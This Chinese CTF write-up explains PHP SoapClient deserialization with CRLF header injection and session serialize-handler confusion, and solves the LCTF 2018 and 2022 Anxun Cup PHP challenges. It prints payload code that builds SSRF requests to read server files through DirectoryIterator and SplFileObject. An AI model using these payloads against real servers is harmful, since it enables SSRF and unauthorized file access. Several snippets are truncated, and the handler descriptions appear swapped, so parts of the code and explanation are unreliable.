提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
目录
前言
一、PHP SOAP
二、漏洞成因
三、 题目知识准备
1、PHP Session反序列化
2、题目相关函数
四、[LCTF 2018]bestphp's revenge
五、2022安洵杯 BabyPHP
提示:这里可以添加本文要记录的大概内容:
今天有一位学弟在安洵杯结束后,发了安洵杯babyPHP的题目跟我探讨,自己看了一下,发现也确实没有碰到过,但是在网上搜到了相应的CTF例题,所以研究了一下,写个总结。
提示:以下是本篇文章正文内容,下面案例可供参考
SOAP是WebService三要素之一,SOAP称为简单对象访问协议,是连接Web服务或客户端和Web服务器之间的接口。采用的是XML作为数据传送格式,HTTP为底层通讯协议。
在PHP中,SOAP扩展有几个类,本次用到的主要是SoapClient类,解释如下:
public SoapClient :: SoapClient (mixed $wsdl [,array $options ])
第一个参数指明是否为wsdl模式,NULL为非wsdl模式,非wsdl模式下进行反序列化的时候会对第二个参数中的url和locaition进行远程soap请求。
第二个参数是数组,表示soap请求的一些参数和属性。
在PHP中,要使用SoapClient,需要在php.ini中开启PHP扩展
1、在原生的PHP SoapClient类中,存在__call魔术方法,当调用不存在的方法时候会自动调用此方法,对location中的URL进行请求,先来看一下。
$target,
'user_agent' => "aiwin",
'uri' => "123"));
$payload = serialize($attack);
echo $payload;
$c=unserialize($payload);
$c->not_function();
可以看到Soap利用HTTP协议传输,传输的数据格式的XML。
重要的是可以看到发送的请求中,uri参数和user_agent参数可控,可以自定义发送soap请求的值,在HTTP请求中,我们知道每一个头部属性值都是通过\r\n换行进行间隔,那么原生Soap就可以通过user_agent通过注入\r\n恶意的换行注入Cookie或者一些其它属性代码,造成CRLF注入。
$target,
'user_agent' => "aiwin\r\nCookie: PHPSESSID=123456\r\n",
'uri' => "123"));
$payload = serialize($attack);
echo $payload;
$c=unserialize($payload);
$c->not_function();
可以看到,恶意注入了Cookie会话,CRLF确实可行。
在php session中,存在一部分参数规定关于session的操作。
session.save_handler 表示session的保存形式是file。
session.save_path 表示session的保存路径,一般linux在/tmp/sess_id。
session.serialize_handler 表示session序列化的存储器,默认的php,还有php_serialize、php_binary。
session.upload_progress_cleanup表示读取了数据后,会立即清除掉session的进度信息。
session.upload_progress_enable表示upload_progress功能启动,即浏览器向服务器上传文件时,php会把此次文件上传的详细信息存储在session中。
session.upload_progress中的prefix 和 name 两项用来设置进度信息在session中存储的变量名/键名。
session.use_strict_mode中的值为off,表示Cookie中的sessionid可控。
关于三种处理器的区别:
处理器为php时,session的内容是键名+竖线+经过序列化函数后反序列化的值,如name|s:5:"aiwin";
处理器为php_binary 内容是ASCII字符+键名+序列化函数后反序列化的值,如a:1:{s:4:"name";s:5:"aiwin";}
处理器为php_serialize 内容是经过序列化后反序列化的数组,如 二进制字符names:5:"aiwin";
那么当session反序列化和序列化的时候使用不同的引擎,即可触发错误,比如,$_SESSION['test'] = '|aiwin',用php_serialize得到的内容为,a:1:{s:4:”name”;s:6:”|aiwin”;},
使用php引擎时,|是分隔符,所以aiwin被当成了值传入了$_SESSION。
(1)call_user_func($value1,$value2)
把第一个参数作为回调函数调用。
(2)extract函数:
从数组中将变量导入到当前的符号表。
该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。
"test", "b" => "Aiwin");
extract($test);
echo "$a=$a"
?>
输出:test=test
(3)PHP的一些原生类
DirectoryIteratory原生类,可以遍历目录,也可以联合glob://协议一起用,可以使用通配符
GlobIterator原生类,与上面类似,不同的是自带了glob协议。
SplFileObject原生类,可以用于读取文件的内容,一般只读取一行,全部读取需要遍历
还有一些原生类这里没用到,就不进行介绍了。
以下例题注意点:自身new SoapClient的PHP版本要为7的版本,开始用的8的版本发现不行,因为PHP8进行new SoapClient生成的东西会比7多很多属性值。
题目源码:
题目说明了flag在flag.php中,利用上面的知识进行做题,首先需要更改handler的引擎为php_serialize,这里存在call_user_func,PHP版本号为7.0+,可以通过call_user_func调用session_start()更好引擎,然后传入构造的new SoapClient的序列化值,然后再通过变量覆盖掉$b,使SoapClient访问不存在的方法welcome_to_the_lctf2018从而访问location中的flag.php,返回flag的值。
$target,
'user_agent' => "aiwin\r\nCookie:PHPSESSID=123456\r\n",
'uri' => "http://127.0.0.1/"));
$se = serialize($b);
echo "|".urlencode($se);
这里通过变量覆盖,覆盖掉b的值,b=call_user_func后call_user_func($b,$a)就变成了call_user_func("call_user_func",array("SoapClient","Welcome_to_the_ctf..."))使SoapClient调用了call_user_func。
这里需要|的原因是因为之前所说的引擎不同造成的漏洞,使用php_serialize引擎序列化后,程序加载session的时候,使用的是php引擎处理,|后的内容就是键值,这样就成功序列化了一个SoapClient对象。
a = "babyhacker";
}
public function __invoke()
{
if (isset($this->a) && $this->a == md5($this->a)) {
$this->b->uwant();
}
}
}
class B
{
public $a;
public $b;
public $k;
function __destruct()
{
$this->b = $this->k;
die($this->a);
}
}
class C
{
public $a;
public $c;
public function __toString()
{
$cc = $this->c;
return $cc();
}
public function uwant()
{
if ($this->a == "phpinfo") {
phpinfo();
} else {
call_user_func(array(reset($_SESSION), $this->a));
}
}
}
if (isset($_GET['d0g3'])) {
ini_set($_GET['baby'], $_GET['d0g3']);
session_start();
$_SESSION['sess'] = $_POST['sess'];
}
else{
session_start();
if (isset($_POST["pop"])) {
unserialize($_POST["pop"]);
}
}
var_dump($_SESSION);
highlight_file(__FILE__);
有一段反序列化,Pop链为B::__toString->A::__invoke()->C::uwant(),绕过A类直接增加A的个数即可,弱相等,绕过md5可以使用科学计数法。
a=new C;
$a->a->c=new A;
$a->a->c->b=new C;
echo serialize($a);
传入pop可以查看到phpinfo()
其实知道是SoapClient造成SSRF,不看phpinfo()也可以。
提示有flag.php,查看flag.php的代码:
这里提示flag在根目录下, $f1ag = implode(array(new $_GET['a']($_GET['b'])));使new出来的原生类能够拼接起来,所以可以通过SSRF访问flag.php并且传入a和b参数的属性为DirectoryIterator原生类联合glob先读取flag的文件名。
$target = 'http://127.0.0.1/flag.php?a=DirectoryIterator&b=glob:///f*';
$b = new SoapClient(null, array('location' => $target,
'user_agent' => "aiwin1\r\nCookie:PHPSESSID=aiwin1\r\n",
'uri' => "http://127.0.0.1/"));
$a = serialize($b);
echo "|" . urlencode($a);
解题和上面一样,先更改引擎,这里有ini_set(),可以直接利用更改引擎。
然后传入反序列的Pop链,使用链条进入call_user_func,触发SoapClient的__call方法
知道了flag的文件名是f111llllllllaagg,然后再通过SplFileObject原生类读取flag。
$target = 'http://127.0.0.1/flag.php?a=SplFileObject&b=/f1111llllllaagg';
$b = new SoapClient(null, array('location' => $target,
'user_agent' => "aiwin1\r\nCookie:PHPSESSID=aiwin1\r\n",
'uri' => "http://127.0.0.1/"));
$a = serialize($b);
echo "|" . urlencode($a);
按照相等步骤传入即可读到flag
总结
漏洞理解起来不算很难,但是从看例题然后解这道安洵杯,还是花费了好多时间,但是也收获了不少,长了不少知识。